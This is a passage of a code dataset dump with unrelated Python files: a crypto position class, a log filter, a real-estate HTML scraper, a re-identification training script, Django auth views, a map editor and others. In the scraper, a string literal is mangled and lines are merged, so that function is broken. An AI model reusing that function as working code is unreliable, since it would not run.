config.make_wsgi_app()\n","sub_path":"docs_proxy.py","file_name":"docs_proxy.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"534755661","text":"'''/*---------------------------------------------------------------------------------------------\n * Copyright (c) VituTech. All rights reserved.\n * Licensed under the Apache License 2.0. See License.txt in the project root for license information.\n *--------------------------------------------------------------------------------------------*/\n'''\nimport datetime\nimport numpy as np\n\nfrom vitu.trade.position.position import Position\nfrom vitu.utils.date_utils import str2timestamp\n\n\nclass SpotPosition(Position):\n # __slots__ = [\n # 'available',\n # 'frozen',\n # '_context'\n # ]\n def __init__(self, asset_class=None, asset=None, available=0, frozen=0, avg_cost_btc=0, avg_cost_usdt=0):\n \"\"\"\n :param asset_class: 'spot'/'contract'\n :param asset: 'btc'/'eth' ...\n :param available: 可用数量\n :param frozen: 冻结数量\n :param avg_cost_btc: btc的持仓成本\n :param\n \"\"\"\n super(SpotPosition, self).__init__(asset_class, asset)\n self.available = available\n self.frozen = frozen\n self.avg_cost_btc = avg_cost_btc\n self.avg_cost_usdt = avg_cost_usdt # TDOD 哪来的None\n\n self._context = None\n\n @property\n def context(self):\n return self._context\n\n @context.setter\n def context(self, context):\n self._context = context\n\n @property\n def value(self):\n \"\"\"\n :return: 持仓市值(随市场价实时变动)\n \"\"\"\n if not self._context:\n return 0\n else:\n date = self._context.clock.current_date\n current_timestamp = str2timestamp(str(date.date())) # 只关注date() time()舍掉\n # current_timestamp = datetime.datetime.timestamp(date)\n cmc_key = 'cmc-spot-' + self.asset + 'usd'\n df = self.context.cacher.data[cmc_key]\n return df.loc[(df['timestamp'] == current_timestamp)]['close'].tolist()[0]\n\n @property\n def total(self):\n \"\"\"\n :return: 总数量\n \"\"\"\n if not self.available + self.frozen:\n return 0\n else:\n return self.available + self.frozen\n @property\n def amount(self):\n \"\"\"\n :return: 持仓浮动盈亏(随市场价实时变动)\n \"\"\"\n if not self.value:\n return 0\n else:\n return self.total * self.value\n\n def order_update(self, currency_type, side, price, qty):\n \"\"\"\n :param currency_type: base/quote 基础货币/计价货币\n :param side: buy/sell\n :param price: 价格\n :param qty: 数量\n \"\"\"\n if side == 'buy':\n if currency_type == 'quote':\n self.available -= price * qty\n self.frozen += price * qty\n if side == 'sell':\n if currency_type == 'base':\n self.available -= qty\n self.frozen += qty\n\n def trade_update(self, currency_type, trade):\n \"\"\"\n {\n\t 'id': '69327ec1-ea66-11e9-bea1-005056c00008',\n\t 'order_id': '69327ec0-ea66-11e9-8746-005056c00008',\n\t 'side': 'buy',\n\t 'price': 3432.88,\n\t 'qty': 145.65029,\n\t 'amount': 499999.967535,\n\t 'commission': 0.02913,\n\t 'create_time': '2018-12-10 00:00:00'\n\t }\n :param currency_type: 'base'/'quote' 基础货币/计价货币\n :param trade: instance\n :param relative_currency: symol的另一个\n \"\"\"\n # btc_usdt\n if trade['side'] == 'buy':\n if currency_type == 'base':\n self.available += (trade['qty'] - trade['commission'])\n # self.available += trade['qty']\n elif currency_type == 'quote':\n self.frozen -= trade['price']*trade['qty']\n\n if trade['side'] == 'sell':\n if currency_type == 'base':\n self.frozen -= trade['qty']\n elif currency_type == 'quote':\n self.available += (trade['price']*trade['qty']-trade['commission'])\n # self.available += trade['price']*trade['qty']\n\n def trade_update_cost(self, currency_type, trade, relative_currency):\n if not self.available:\n self.avg_cost_btc = 0\n self.avg_cost_usdt = 0\n return\n if trade['side'] == 'buy':\n if currency_type == 'base':\n self.avg_cost_btc = ((self.available-trade['qty']+trade['commission']) * self.avg_cost_btc +\n (relative_currency.avg_cost_btc * trade['amount'])) / self.available\n self.avg_cost_usdt = ((self.available-trade['qty']+trade['commission']) * self.avg_cost_usdt +\n (relative_currency.avg_cost_usdt * trade['amount'])) / self.available\n elif currency_type == 'quote':\n self.avg_cost_btc = self.avg_cost_btc\n self.avg_cost_usdt = self.avg_cost_usdt\n if trade['side'] == 'sell':\n if currency_type == 'base':\n self.avg_cost_btc = self.avg_cost_btc\n self.avg_cost_usdt = self.avg_cost_usdt\n elif currency_type == 'quote':\n self.avg_cost_btc = ((self.available-trade['amount']+trade['commission']) * self.avg_cost_btc +\n (relative_currency.avg_cost_btc * trade['qty'])) / self.available\n self.avg_cost_usdt = ((self.available-trade['amount']+trade['commission']) * self.avg_cost_usdt +\n (relative_currency.avg_cost_usdt * trade['qty'])) / self.available\n\n def detail(self):\n return {\n 'asset_class':self.asset_class,\n 'asset':self.asset,\n 'amount':round(self.amount, 6),\n 'value':round(self.value, 6), #\n 'total':round(self.total, 6),\n 'available':round(self.available, 6),\n 'frozen':self.frozen,\n\n 'avg_cost_btc':self.avg_cost_btc,\n 'avg_cost_usdt':self.avg_cost_usdt\n }\n\n def to_dict(self):\n return {\n 'asset': self.asset,\n 'available': round(self.available, 6),\n 'frozen': self.frozen,\n\n 'avg_cost_btc': self.avg_cost_btc,\n 'avg_cost_usdt': self.avg_cost_usdt\n }\n\n def __repr__(self):\n return \"SpotPosition(asset_class: {}, asset: {}, amount: {}, value: {}, total: {}, available: {}, frozen: {}, \" \\\n \"avg_cost_btc: {}, avg_cost_usdt: {})\".format(\n self.asset_class, self.asset, round(self.amount, 4), round(self.value, 4), round(self.total, 4),\n round(self.available, 4), self.frozen, self.avg_cost_btc, self.avg_cost_usdt)","sub_path":"vitu/trade/position/spot_position.py","file_name":"spot_position.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"154710166","text":"from sys import argv\nimport os\n\nif len(argv) < 3:\n print('Fatal: you forgot to enter an argument.')\n\nscript, filename, second = argv\n\nif not os.access(filename, os.F_OK):\n print('No such file')\ntxt = open(filename)\n\nfor row in txt:\n if \"COMPLETED\" in row:\n words = row.split()\n a = words[-1]\n c = float(a)\n b = float(second)\n if c > b:\n print(c)\n \n","sub_path":"log39.py","file_name":"log39.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"464667647","text":"from bs4 import BeautifulSoup\nimport Utils\nimport re\nfrom Constants import *\n\n\ndef parse_baths_string(baths_text):\n sections = baths_text.split(', ')\n num_halfs = []\n if len(sections) > 1:\n num_halfs_string = sections[1]\n num_halfs = [int(re.search(r'\\d+', num_halfs_string).group())]\n\n num_fulls_string = sections[0]\n num_fulls = [int(re.search(r'\\d+', num_fulls_string).group())]\n if len(num_halfs) > 0:\n num_beds = num_fulls[0] + num_halfs[0] / 2\n else:\n num_beds = num_fulls[0]\n return num_beds\n\n\ndef files_to_json(today, file_array):\n\n number_of_listings = 0\n json_file_array = []\n\n for homefinderFile in file_array:\n\n # Create a list of dictionaries for JSON Object\n response = []\n\n # Prepare for parsing file with BeautifulSoup\n soup_homefinder_file = BeautifulSoup(open(HOMEFINDER_HTML_DIR + homefinderFile), 'lxml')\n\n # Parse Homefinder file\n # 'position' marks the beginning of each house listing card in the html\n # All other data is found in its relationship to 'position'\n for things in soup_homefinder_file.findAll('div', attrs={'class': 'propertyDescription'}):\n\n to_search = str(things)\n\n price_test = to_search.split('class=\"price\"> $')\n if len(price_test) > 1:\n price_key = to_search.split('class=\"price\"> $')[1]\n price = price_key.split(' <')[0]\n else:\n price = \"\"\n\n url_test = to_search.split('href=\"')\n if len(url_test) > 1:\n url_key = to_search.split('href=\"')[1]\n property_url = url_key.split('\" item')[0]\n else:\n property_url = \"\"\n\n zip_test = to_search.split('cityStZip\"> Nashville, TN ')\n if len(zip_test) > 1:\n zip_key = to_search.split('cityStZip\"> Nashville, TN ')[1]\n zip_code = zip_key.split(' 1:\n street_key = to_search.split('meta content=\"')[1]\n street_address = street_key.split('\"')[0]\n else:\n street_address = \"\"\n\n beds_test = to_search.split('class=\"beds\">')\n if len(beds_test) > 1:\n beds_key = to_search.split('class=\"beds\">')[1]\n beds_num = beds_key.split(' Beds')[0]\n beds = str(beds_num)\n else:\n beds = \"\"\n\n baths_test = to_search.split('class=\"baths\">')\n if len(baths_test) > 1:\n baths_key = to_search.split('class=\"baths\">')[1]\n baths_text = baths_key.split('')[0]\n baths_num = parse_baths_string(baths_text)\n baths = str(baths_num)\n else:\n baths = \"\"\n\n square_feet = \"\"\n\n source = \"Homefinder\"\n\n # Make changes to response for each listing\n json_item = Utils.make_housing_json_object(street_address,\n zip_code,\n price,\n beds,\n baths,\n square_feet,\n property_url,\n source,\n today)\n response.append(json_item)\n number_of_listings += 1\n\n # Write response to JSON file\n plain_filename = homefinderFile.replace('.html', '.json')\n Utils.write_json_to_file(HOMEFINDER_JSON_DIR, plain_filename, response)\n json_file_array.append(HOMEFINDER_JSON_DIR + plain_filename)\n\n print(\"Number of Homefinder listings converted to json: \" + str(number_of_listings))\n return json_file_array\n","sub_path":"WebProject_nsottek/HomefinderToJson.py","file_name":"HomefinderToJson.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"511896769","text":"\"\"\"\n This is the custom function interface.\n You should not implement it, or speculate about its implementation\n\"\"\"\n\n\nclass CustomFunction:\n # Returns f(x, y) for any given positive integers x and y.\n # Note that f(x, y) is increasing with respect to both x and y.\n # i.e. f(x, y) < f(x + 1, y), f(x, y) < f(x, y + 1)\n def f(self, x, y):\n\n return x+y\n\n\nclass Solution:\n def findSolution(self, customfunction: 'CustomFunction', z: int) -> list[list[int]]:\n # 方法一:双层循环,时间复杂度为O(n*n)\n # ls = []\n # for x in range(1,1001):\n # if customfunction.f(x, 1) > z:\n # break\n # for y in range(1,1001):\n # ans = customfunction.f(x, y)\n # if ans == z:\n # ls.append([x, y])\n # if ans > z:\n # break\n # return ls\n\n # 方法二:双指针,时间复杂度为O(n)\n ls = []\n left = 1\n right = 1000\n while left <= 1000 and right >= 1:\n tmp = customfunction.f(left,right)\n if tmp == z:\n ls.append([left, right])\n left += 1\n elif tmp > z:\n right -= 1\n else:\n left += 1\n return ls\n\n\na = Solution()\nb = CustomFunction()\na.findSolution(b, 5)\n","sub_path":"src/找出给定方程的正整数解.py","file_name":"找出给定方程的正整数解.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"487864594","text":"from __future__ import print_function, absolute_import\nimport argparse\nimport os.path as osp\n\nimport numpy as np\nimport sys\nimport torch\n\nfrom torch import nn\nfrom torch.backends import cudnn\nfrom torch.utils.data import DataLoader\n\nfrom reid import datasets\nfrom reid import models\nfrom reid.trainers import Trainer, CamStyleTrainer\nfrom reid.evaluators import Evaluator\nfrom reid.utils.data import transforms as T\nfrom reid.utils.data.preprocessor import Preprocessor\nfrom reid.utils.logging import Logger\nfrom reid.utils.data.sampler import RandomIdentitySampler\nfrom reid.utils.serialization import load_checkpoint, save_checkpoint\nfrom reid.loss import TripletLoss, NewTripletLoss\n\n\ndef get_data(dataname, data_dir, height, width, batch_size, camstyle=0, re=0, num_instances=4, workers=8):\n root = osp.join(data_dir, dataname)\n\n dataset = datasets.create(dataname, root)\n\n normalizer = T.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n num_classes = dataset.num_train_ids\n\n train_transformer = T.Compose([\n T.RandomSizedRectCrop(height, width),\n T.RandomHorizontalFlip(),\n T.ToTensor(),\n normalizer,\n T.RandomErasing(EPSILON=re),\n ])\n\n test_transformer = T.Compose([\n T.RectScale(height, width),\n T.ToTensor(),\n normalizer,\n ])\n\n train_loader = DataLoader(\n Preprocessor(dataset.train, root=osp.join(dataset.images_dir, dataset.train_path),\n transform=train_transformer),\n batch_size=batch_size, num_workers=workers,\n sampler=RandomIdentitySampler(dataset.train, num_instances),\n pin_memory=True, drop_last=True)\n\n query_loader = DataLoader(\n Preprocessor(dataset.query,\n root=osp.join(dataset.images_dir, dataset.query_path), transform=test_transformer),\n batch_size=batch_size, num_workers=workers,\n shuffle=False, pin_memory=True)\n\n gallery_loader = DataLoader(\n Preprocessor(dataset.gallery,\n root=osp.join(dataset.images_dir, dataset.gallery_path), transform=test_transformer),\n batch_size=batch_size, num_workers=workers,\n shuffle=False, pin_memory=True)\n\n return dataset, num_classes, train_loader, query_loader, gallery_loader\n\n\ndef main(args):\n cudnn.benchmark = True\n # Redirect print to both console and log file\n if not args.evaluate:\n sys.stdout = Logger(osp.join(args.logs_dir, 'log.txt'))\n\n # Create data loaders\n dataset, num_classes, train_loader, query_loader, gallery_loader = \\\n get_data(args.dataset, args.data_dir, args.height,\n args.width, args.batch_size, args.camstyle, args.re, args.num_instances, args.workers)\n\n # Create model\n model = models.create(args.arch, num_features=2048,\n dropout=args.dropout, num_classes=args.features)\n\n # Load from checkpoint\n start_epoch = 0\n if args.resume:\n checkpoint = load_checkpoint(args.resume)\n model.load_state_dict(checkpoint['state_dict'])\n start_epoch = checkpoint['epoch']\n print(\"=> Start epoch {} \"\n .format(start_epoch))\n model = nn.DataParallel(model).cuda()\n\n # Evaluator\n evaluator = Evaluator(model)\n if args.evaluate:\n print(\"Test:\")\n evaluator.evaluate(query_loader, gallery_loader, dataset.query, dataset.gallery, args.output_feature, args.rerank)\n return\n\n # Criterion\n # criterion = TripletLoss(margin=args.margin).cuda()\n criterion_cro = nn.CrossEntropyLoss().cuda()\n criterion_tri = TripletLoss(margin=args.margin).cuda()\n # Optimizer\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr,\n weight_decay=args.weight_decay)\n\n # Trainer\n trainer = Trainer(model, criterion_cro, criterion_tri)\n\n # Schedule learning rate\n def adjust_lr(epoch):\n lr = args.lr if epoch <= 100 else \\\n args.lr * (0.001 ** ((epoch - 100) / 50.0))\n for g in optimizer.param_groups:\n g['lr'] = lr * g.get('lr_mult', 1)\n\n # Start training\n for epoch in range(start_epoch, args.epochs):\n adjust_lr(epoch)\n trainer.train(epoch, train_loader, optimizer)\n\n save_checkpoint({\n 'state_dict': model.module.state_dict(),\n 'epoch': epoch + 1,\n }, fpath=osp.join(args.logs_dir, 'checkpoint.pth.tar'))\n\n print('\\n * Finished epoch {:3d} \\n'.\n format(epoch))\n\n # Final test\n print('Test with best model:')\n evaluator = Evaluator(model)\n evaluator.evaluate(query_loader, gallery_loader, dataset.query, dataset.gallery, args.output_feature, args.rerank)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"CamStyle\")\n # data\n parser.add_argument('-d', '--dataset', type=str, default='market',\n choices=datasets.names())\n parser.add_argument('-b', '--batch-size', type=int, default=32)\n parser.add_argument('-j', '--workers', type=int, default=8)\n parser.add_argument('--height', type=int, default=256,\n help=\"input height, default: 256\")\n parser.add_argument('--width', type=int, default=128,\n help=\"input width, default: 128\")\n # model\n parser.add_argument('-a', '--arch', type=str, default='resnet50',\n choices=models.names())\n parser.add_argument('--features', type=int, default=128)\n parser.add_argument('--dropout', type=float, default=0)\n # optimizer\n parser.add_argument('--lr', type=float, default=0.0002)\n parser.add_argument('--momentum', type=float, default=0.9)\n parser.add_argument('--weight-decay', type=float, default=5e-4)\n # training configs\n parser.add_argument('--resume', type=str, default='', metavar='PATH')\n parser.add_argument('--evaluate', action='store_true',\n help=\"evaluation only\")\n parser.add_argument('--epochs', type=int, default=150)\n parser.add_argument('--print-freq', type=int, default=1)\n # metric learning\n parser.add_argument('--dist-metric', type=str, default='euclidean')\n # misc\n working_dir = osp.dirname(osp.abspath(__file__))\n parser.add_argument('--data-dir', type=str, metavar='PATH',\n default=osp.join(working_dir, 'data'))\n parser.add_argument('--logs-dir', type=str, metavar='PATH',\n default=osp.join(working_dir, 'logs'))\n parser.add_argument('--output_feature', type=str, default='pool5')\n #random erasing\n parser.add_argument('--re', type=float, default=0)\n # camstyle batchsize\n parser.add_argument('--camstyle', type=int, default=0)\n # perform re-ranking\n parser.add_argument('--rerank', action='store_true', help=\"perform re-ranking\")\n\n parser.add_argument('--num-instances', type=int, default=4,\n help=\"each minibatch consist of \"\n \"(batch_size // num_instances) identities, and \"\n \"each identity has num_instances instances, \"\n \"default: 4\")\n # loss\n parser.add_argument('--margin', type=float, default=0.3,\n help=\"margin of the triplet loss, default: 0.3\")\n main(parser.parse_args())\n","sub_path":"triplet.py","file_name":"triplet.py","file_ext":"py","file_size_in_byte":7341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"628039904","text":"\"\"\"User Views.\"\"\"\n\n# Django REST Fremework\nfrom rest_framework import mixins, status, viewsets\nfrom rest_framework.decorators import action \nfrom rest_framework.response import Response\n\n# Permissions\nfrom rest_framework.permissions import (\n\tAllowAny,\n\tIsAuthenticated\n)\n\n# Serializers\nfrom omnilatam.apps.user.api.serializers import ProfileModelSerializers\nfrom omnilatam.apps.user.api.serializers.user import (\n\tUserModelSerializer,\n\tUserSignUpSerializer, \n\tUserLoginSerializer,\n\tAccountVerificationSerializer\n)\n\n\n# Models\nfrom omnilatam.apps.user.models import User, Profile\n\n# Authenticate\nfrom django.contrib.auth import login, logout\n\n\nclass UserViewSet(mixins.RetrieveModelMixin,\n\t\t\t\t mixins.UpdateModelMixin,\n\t\t\t\t viewsets.GenericViewSet):\n\t\"\"\"User view set\n\n\tHandle sign up, login and account verification\n\t\"\"\"\n\n\tqueryset = User.objects.filter(is_active=True)\n\tserializer_class = UserModelSerializer\n\tlookup_field='username'\n\n\n\t@action(detail=False, methods=['post'])\n\tdef login(self, request):\n\t\t\"\"\"User sign in.\"\"\"\n\t\tserializer = UserLoginSerializer(data=request.data)\n\t\tserializer.is_valid(raise_exception=True)\n\t\tuser, token = serializer.save()\n\t\tlogin(request, user)\n\t\tdata = {\n\t\t\t'user':UserModelSerializer(user).data,\n\t\t\t'acces_token':token\n\t\t}\n\n\t\treturn Response(data, status=status.HTTP_201_CREATED)\n\t\n\t@action(detail=False, methods=['get'])\n\tdef logout(self, request):\n\t\trequest.user.auth_token.delete()\n\t\tlogout(request)\n\t\treturn Response(status=status.HTTP_200_OK)\n\n\t@action(detail=False, methods=['post'])\n\tdef signup(self, request):\n\t\t\"\"\"User sign up.\"\"\"\n\t\tserializer = UserSignUpSerializer(data=request.data)\n\t\tserializer.is_valid(raise_exception=True)\n\t\tuser = serializer.save()\n\t\tdata = UserModelSerializer(user).data\n\t\treturn Response(data, status=status.HTTP_201_CREATED)\n\n\t@action(detail=False, methods=['post'])\n\tdef verify(self, request):\n\t\t\"\"\"Account verification\"\"\"\n\t\tserializer = AccountVerificationSerializer(data=request.data)\n\t\tserializer.is_valid(raise_exception=True)\n\t\tserializer.save()\n\t\tdata = {'message':'Congratulation, now go and buy anything!'}\n\t\treturn Response(data, status=status.HTTP_200_OK)\n\n\t@action(detail=True, methods=['put', 'patch'])\n\tdef profile(self, request, *args, **kwargs):\n\t\t\"\"\"Update profile data.\"\"\"\n\t\tuser = self.get_object()\n\t\tprofile = user.profile\n\t\tpartial = request.method == 'PATCH'\n\t\tserializer = ProfileModelSerializers(\n\t\t\tprofile,\n\t\t\tdata=request.data,\n\t\t\tpartial=partial\n\t\t)\n","sub_path":"apps/user/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"546556346","text":"# -*- coding: utf-8 -*-\nfrom django import template\nfrom django.utils.html import conditional_escape as esc\nfrom django.utils.safestring import mark_safe\n\nfrom apps.oi.models import IssueRevision, states, CTYPES\n\nregister = template.Library()\n\nLANGUAGES=['de']\n\ndef last_updated_issues(parser, token):\n \"\"\"\n Display the last updated indexes as a tag\n token is the content of the tag:\n last_updated_issues language=\n where both number and language are optional\n \"\"\"\n try:\n number = int(token.split_contents()[1].split('=')[1])\n except:\n number = 5\n\n language_in_context = None\n language_code = None\n language_pos = token.contents.find('language')\n if language_pos > 0:\n language_pos += len('language=')\n code = token.contents[language_pos:].lower().strip()\n if code in LANGUAGES: # either a supported language code \n language_code = code\n else: # or the language_code via a template variable\n language_in_context = code\n\n return LastUpdatedNode(number, language_code, language_in_context)\n\n\nclass LastUpdatedNode(template.Node):\n def __init__(self, number, language_code, language_in_context):\n if language_in_context:\n self.language_in_context = template.Variable(language_in_context)\n else:\n self.language_in_context = None\n self.language_code = language_code\n self.number = number\n\n def render(self, context):\n if self.language_in_context:\n try:\n self.language_code = self.language_in_context.resolve(context)\n except: # render in templates should fail silently\n return u''\n\n issues = IssueRevision.objects.filter(issue__story_type_count__gt=0, \n changeset__change_type=CTYPES['issue'],\n changeset__state=states.APPROVED).order_by('-changeset__modified')\\\n .select_related('issue', 'issue__series', 'issue__series__publisher')\n if self.language_code:\n issues = issues.filter(issue__series__language__code=self.language_code)\n \n last_updated_issues = issues[:self.number]\n return_string = u'
    '\n for issue_revision in last_updated_issues:\n i = issue_revision.issue\n return_string += u'
  • %s #%s (%s)
  • ' % \\\n (i.get_absolute_url(), esc(i.series),\n esc(i.number), esc(i.series.publisher.name))\n \n return mark_safe(return_string+'
')\n\n\nregister.tag('last_updated_issues', last_updated_issues)\n","sub_path":"branches/bobbygrace/pydjango/apps/gcd/templatetags/statustags.py","file_name":"statustags.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"592641149","text":"# ハノイの塔\n\ndef move(no: int, x: int, y:int) -> None:\n # no枚の円盤をx軸からy軸へ移動\n if no > 1:\n move(no - 1, x, 6 - x - y)\n\n print(f'円盤[{no}]を{x}軸から{y}軸へ移動')\n\n if no > 1:\n move(no - 1, 6 - x -y, y)\n\nprint('ハノイの塔')\nn = int(input('円盤の枚数:'))\n\nmove(n, 1, 3) # 第1軸に積まれたn枚を第3軸に移動","sub_path":"Recursive algorithm_5/5-3/hanoi.py","file_name":"hanoi.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"207652998","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.12-x86_64/egg/webstarts/gunicorn.py\n# Compiled at: 2017-09-29 15:01:16\n# Size of source mod 2**32: 1204 bytes\n\"\"\"Applicable to webstarts\"\"\"\nimport logging\nfrom gunicorn.app.wsgiapp import WSGIApplication\nfrom gunicorn.glogging import Logger\n__author__ = 'john'\nfrom . import types\n\nclass WebstartsApp(WSGIApplication):\n __doc__ = 'Gunicorn wrapper'\n\n def __init__(self, program, is_dev=False):\n self.is_dev = is_dev\n super().__init__(program)\n\n def load_wsgiapp(self):\n app = super().load_wsgiapp()\n from . import log_id, wflask\n app = log_id.wrap_logid(app)\n app = wflask.wrap_sentry(app)\n return app\n\n def init(self, parser, opts, args):\n cfg = super().init(parser, opts, args) or {}\n cfg['logger_class'] = GunicornLogger\n if self.is_dev:\n cfg.update(reload=True, timeout=99999, accesslog='-')\n return cfg\n\n\nclass GunicornLogger(Logger):\n\n def setup(self, cfg):\n super().setup(cfg)\n self.error_log.propagate = True\n self._set_handler(self.error_log, None, None)\n self.access_log.propagate = True\n self._set_handler(self.access_log, None, None)\n\n @classmethod\n def install(cls):\n logging.setLoggerClass(types.WebstartsLogger)","sub_path":"pycfiles/webstarts-2.9.0-py3.6/gunicorn.cpython-36.py","file_name":"gunicorn.cpython-36.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"215020513","text":"\r\nimport pprint\r\nfrom mapedit import *\r\nfrom mapedit.widgets import *\r\nfrom mapedit.menu import MenuBar, register\r\nfrom mapedit.map import *\r\nfrom mapedit.palette import *\r\nfrom stexit3 import execute as e\r\n\r\nclass App:\r\n never_disable = ('open_map', 'new_map')\r\n map_file = ''\r\n tile_set_file = ''\r\n tile_set_dir = ''\r\n def __init__(self):\r\n self.root = Tk()\r\n self._has_been_modified = False\r\n self.menu = MenuBar(self)\r\n self.map = MapBox(self)\r\n self.palette = Palette(self)\r\n self.map .grid(column=0, row=0, sticky='nw')\r\n self.palette .grid(column=1, row=0, sticky='ne')\r\n self.map_file='aftereventrefactor.map'\r\n self._open_map()\r\n self.root.resizable(height=0, width=0)\r\n self.root.title('Map editor')\r\n self.root.mainloop()\r\n\r\n def enable(self):\r\n state.tiles.load_photos()\r\n state.build_map()\r\n state.current_tile = state.tiles[0,0]\r\n photos.selected_tile_image = state.current_tile.image.resize((48,48))\r\n self.palette.current_tile_label.config(image=photos.selected_tile_image)\r\n self.palette.canvas .grid(row=0, column=0, columnspan=3)\r\n self.palette.sep1 .grid(row=1, column=0, columnspan=3,sticky='nsew',\r\n pady=5, padx=5)\r\n self.palette.tool_size_label.grid(row=2, column=0, sticky='nsew')\r\n self.palette.current_tile_label.grid(row=2, column=1, sticky='w',rowspan=2)\r\n self.palette.lbox.grid(row=3, column=0,sticky='nsew', padx=5)\r\n self.palette.sep2 .grid(row=4, column=0, sticky='nsew',\r\n columnspan=3, pady=5, padx=5)\r\n self.palette.layer_box .grid(row=5, column=0, columnspan=3)\r\n \r\n self.map.unloaded.grid_forget()\r\n self.map.canvas.grid(row=0, column=0)\r\n self.map.clear_canvas()\r\n if settings.map_width > 400:\r\n self.map.canvas.config(width=384,\r\n xscrollincrement=settings.tile_size,\r\n xscrollcommand=self.map.hbar.set,)\r\n self.map.hbar.grid(row=1, column=0, sticky='ew') \r\n else:\r\n self.map.vbar.grid_forget()\r\n if settings.map_height > 400:\r\n self.map.canvas.config(height=384,\r\n yscrollincrement=settings.tile_size,\r\n yscrollcommand=self.map.vbar.set,)\r\n self.map.vbar.grid(row=0, column=1, sticky='ns') \r\n else:\r\n self.map.vbar.grid_forget()\r\n self.map.move_to_left()\r\n self.map.move_to_top()\r\n self.map.canvas.config(scrollregion=(0, 0, *settings.map_size))\r\n self.map.make_background()\r\n self.map.map_background = self.map.canvas.create_image(\r\n settings.map_width//2,\r\n settings.map_height//2,\r\n image=photos.map_background)\r\n\r\n for item in state.stack:\r\n item.exec(self.map)\r\n self.palette.update_layer_views()\r\n self.palette.refresh_photo()\r\n self.bind_events()\r\n self.menu.enable_all()\r\n\r\n def set_title(self):\r\n asterick = '*' if self.has_been_modified else ''\r\n size = f'{settings.map_tile_width}x{settings.map_tile_height}'\r\n msg = f'{asterick}{self.map_file} {size}{asterick}'\r\n self.root.title(f'Map Editor - {msg}')\r\n \r\n @property\r\n def has_been_modified(self):\r\n return self._has_been_modified\r\n @has_been_modified.setter\r\n def has_been_modified(self, value):\r\n self._has_been_modified = value\r\n self.set_title()\r\n \r\n @register('file', never_disable=True)\r\n def new_map(self, *args):\r\n newmapwin = NewMapDialog(self.root)\r\n if newmapwin.confirmed:\r\n state.update(newmapwin.state)\r\n self.enable()\r\n self.map_file = 'New map'\r\n \r\n @register('file', never_disable=True)\r\n def open_map(self, *args):\r\n filename= askopenfilename(parent=self.root,\r\n title='Open',\r\n filetypes=(('Map files', '.*map'),),\r\n initialfile=self.map_file)\r\n if filename:\r\n self.map_file = filename\r\n self._open_map()\r\n def _open_map(self):\r\n with open(self.map_file, 'rb') as file:\r\n s = pickle.load(file)\r\n self.has_been_modified = False\r\n state.update(s)\r\n self.enable()\r\n w = settings.map_tile_width\r\n h = settings.map_tile_height\r\n\r\n register.separator('file')\r\n\r\n def _save_map(self):\r\n data = pickle.dumps(state)\r\n with open(self.map_file, 'wb') as file:\r\n file.write(data)\r\n self.has_been_modified = False\r\n @register('file')\r\n def save_map(self, *args):\r\n if not self.map_file:\r\n self.save_map_as()\r\n self._save_map()\r\n \r\n @register('file')\r\n def save_map_as(self, *args):\r\n filename = asksaveasfilename(parent=self.root,\r\n title='Save as',\r\n filetypes=(('Map files', '.*map'),),\r\n initialfile=self.map_file,\r\n defaultextension='.map')\r\n if filename:\r\n self.map_file = filename\r\n self._save_map()\r\n self.root.title(f'Map editor - {self.map_file}')\r\n\r\n register.separator('file')\r\n\r\n @register('file')\r\n def save_tile_set_as(self, *args):\r\n filename = asksaveasfilename(parent=self.root,\r\n title='Save tile set as',\r\n filetypes=(('Tile set files', '.*til'),),\r\n initialfile='',\r\n defaultextension='.til')\r\n if filename:\r\n with open(filename, 'wb') as file:\r\n pickle.dump(state.tiles, file)\r\n \r\n @register('edit')\r\n def undo(self, *args):\r\n if not state.stack:\r\n return\r\n executor = state.stack.pop()\r\n if isinstance(executor, MapAdd):\r\n events, tile = executor.events, executor.tile\r\n for event in events:\r\n cell = state.current_map[(*event.grid, tile.layer)]\r\n tile, tag = cell.pop()\r\n self.map.canvas.delete(tag)\r\n elif isinstance(executor, MapDel):\r\n events = executor.events\r\n for event, tile in events:\r\n MapAdd((event,),tile).exec(self.map)\r\n state.redo_stack.append(executor)\r\n \r\n @property\r\n def cm(self):\r\n return state.current_map\r\n \r\n def old_undo(self, *args):\r\n if not state.stack:\r\n return\r\n executor = state.stack.pop()\r\n if executor.func is map_del:\r\n index = state.stack.index(StackItem(map_add, *executor.args))\r\n state.stack[index].exec(self.map)\r\n elif executor.func is map_add:\r\n event, tile = executor.args\r\n cell = state.current_map[(*event.grid, tile.layer)]\r\n tile, tag = cell.pop()\r\n self.map.canvas.delete(tag)\r\n state.redo_stack.append(executor)\r\n\r\n @register('edit') \r\n def redo(self, *args):\r\n if not state.redo_stack:\r\n return\r\n executor = state.redo_stack.pop()\r\n executor.exec(self.map)\r\n state.stack.append(executor)\r\n\r\n register.separator('edit')\r\n\r\n @register('edit')\r\n def add_remove_tiles(self, *args):\r\n self.paletteeditorwin = 